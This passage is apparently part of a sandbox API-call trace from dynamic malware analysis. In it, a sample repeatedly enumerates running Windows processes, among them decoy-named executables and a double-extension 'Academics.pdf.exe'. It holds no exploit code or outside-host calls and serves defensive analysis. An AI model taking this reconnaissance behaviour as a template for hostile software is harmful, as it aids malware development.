hHeap=0x25c0000) returned 1 [0298.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0298.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0298.816] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0298.817] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0298.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0298.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0298.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0298.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0298.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0298.817] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0298.830] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.831] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0298.832] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0298.832] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.833] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0298.835] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.836] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0298.837] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0298.838] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0298.839] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0298.840] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.840] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.841] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.842] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.843] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.844] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0298.845] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.845] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.846] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0298.847] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0298.848] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0298.849] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0298.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0298.851] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0298.852] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0298.853] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0298.854] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0298.854] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0298.855] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0298.856] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0298.857] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0298.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0298.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0298.859] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0298.860] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0298.861] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0298.862] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0298.862] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0298.863] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0298.864] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0298.865] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0298.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.867] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.868] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0298.870] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0298.872] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0298.873] CloseHandle (hObject=0x294) returned 1 [0298.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0298.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0298.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0298.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0298.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0298.874] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0298.874] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0298.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0298.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0298.874] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0298.876] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.877] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0298.878] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0298.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.880] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0298.880] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0298.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0298.883] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0298.884] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0298.885] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.886] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.887] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.888] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.889] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.889] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0298.890] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.891] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.892] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0298.893] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0298.893] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0298.894] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0298.895] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.896] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0298.897] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0298.898] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 